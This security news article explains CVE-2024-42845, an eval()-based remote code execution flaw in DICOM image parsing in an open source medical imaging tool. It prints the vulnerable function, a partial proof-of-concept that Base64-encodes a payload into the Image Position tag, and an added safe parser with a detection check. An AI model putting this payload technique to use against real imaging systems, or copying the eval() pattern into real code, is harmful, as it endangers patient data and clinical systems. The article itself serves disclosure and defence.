Tic TAC Alert: A Remote Code Execution Vulnerability in Medical Imaging

A serious remote code execution (RCE) vulnerability has been discovered in a popular open source biomedical tool.

The vulnerability, identified as CVE-2024-42845, raises concerns about the security of medical data and the integrity of the imaging process.

The vulnerability has been patched in the latest version, but the incident highlights the need for continued vigilance in the healthcare software space.

The vulnerability exists in the handling of DICOM (Digital Imaging and Communications in Medicine) files, a standard for transmitting, storing and sharing medical images.

DICOM is widely adopted in hospitals and clinics around the world, so any security breach could have far-reaching consequences.

CVE-2024-42845 – the Vulnerability

The vulnerability, CVE-2024-42845, is located in the software functionality that handles the DICOM standard tag (0x0020, 0x0032), Image Position (Patient).

This tag contains the coordinates of the top-left voxel of the image. The issue stems from the use of Python’s eval() function, which can execute arbitrary code if manipulated by a malicious actor.

def GetImagePosition(self):
    try:
        # Tag (0020,0032) as stored by the loader; comma decimals are normalised to dots
        data = self.data_image[str(0x020)][str(0x032)].replace(",", ".")
    except KeyError:
        return ""
    if data:
        # Each backslash-separated component is passed straight to eval()
        return [eval(value) for value in data.split("\\")]
    return ""

Here, eval() is called on every backslash-separated component of the tag value read from the DICOM file, so a payload injected into the Image Position (Patient) value is executed when the file is loaded.

The character substitutions in the code (commas are replaced with dots and the value is split on backslashes) prevent most standard payloads from surviving the parsing step. However, attackers can circumvent this by encoding the malicious commands using Base64 (provided in the Python standard library).

Code vulnerability example

To exploit this vulnerability, an attacker needs to modify or create a DICOM file that appends its payload as the fourth value to the tag at location (0x0020, 0x0032). After loading the modified file, the payload will be executed.

import pydicom
import base64

def encode_payload(plain_payload):
    # Base64 wrapping keeps the payload free of the characters the parser rewrites
    data = open(plain_payload, 'rb').read()
    return f"exec(__import__('base64').b64decode({base64.b64encode(data)}))"

def prepare_dicom_payload(dicom_file_path, payload):
    dicom_data = pydicom.dcmread(dicom_file_path)
    value = dicom_data[0x0020, 0x0032].value
    mal = [str(i) for i in value]
    mal.append(encode_payload(payload))  # appended as the fourth component
    # Further steps to save the modified DICOM file

Securing Medical Imaging Systems

This vulnerability highlights the importance of taking rigorous security measures in the development and deployment of medical imaging software.

Users of the affected software are advised to update to the latest versions immediately. Developers should prioritize secure coding practices and consider using additional input validation techniques to prevent similar vulnerabilities.
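The input validation the article calls for, as an added example that is not the project's own code: Image Position (Patient) is parsed as three DICOM decimal strings with float() instead of eval(), and a helper flags any value the strict parser rejects, so a tampered tag is refused rather than executed. The sample tag values are constructed for this example.

```python
import re

# DICOM "Decimal String" (DS) value representation: optional sign, digits,
# optional decimal point, optional exponent; at most 16 characters.
_DS_RE = re.compile(r"^[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?$")

def parse_image_position(raw):
    """Parse Image Position (Patient), tag (0020,0032), without eval().

    `raw` is the tag value as a string: three DS values separated by
    backslashes.  Returns a list of three floats, or raises ValueError
    when the value does not conform, so a tampered file is rejected
    instead of executed.
    """
    if not raw:
        return []
    # Tolerate comma decimals, as the original loader did, then split on the
    # DICOM multi-value delimiter.
    parts = raw.replace(",", ".").split("\\")
    if len(parts) != 3:
        raise ValueError(f"expected 3 components, got {len(parts)}")
    out = []
    for p in parts:
        p = p.strip()
        if len(p) > 16 or not _DS_RE.match(p):
            raise ValueError(f"invalid DS component: {p!r}")
        out.append(float(p))
    return out

def is_suspicious_image_position(raw):
    """Detection helper: True when the tag value is anything other than
    three well-formed decimal strings (e.g. an appended fourth component)."""
    try:
        parse_image_position(raw)
    except ValueError:
        return True
    return False

# Constructed sample values (not taken from the article or any real file)
BENIGN = "-125.0\\-130.0\\90.5"
TAMPERED = "-125.0\\-130.0\\90.5\\__placeholder_component__"  # 4th, non-numeric

if __name__ == "__main__":
    print(parse_image_position(BENIGN))            # [-125.0, -130.0, 90.5]
    print(is_suspicious_image_position(TAMPERED))  # True
```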

DICOM Vulnerabilities

According to a report by researcher Partywave, the discovery and responsible disclosure of this RCE vulnerability highlights the collaborative efforts required to protect open source medical tools.

While the vulnerability has since been resolved, it serves as a reminder of the ongoing challenges facing cybersecurity in healthcare.

Efforts like this ensure that the cybersecurity posture of healthcare continues to strengthen, protecting sensitive patient data and increasing the reliability of medical technology.
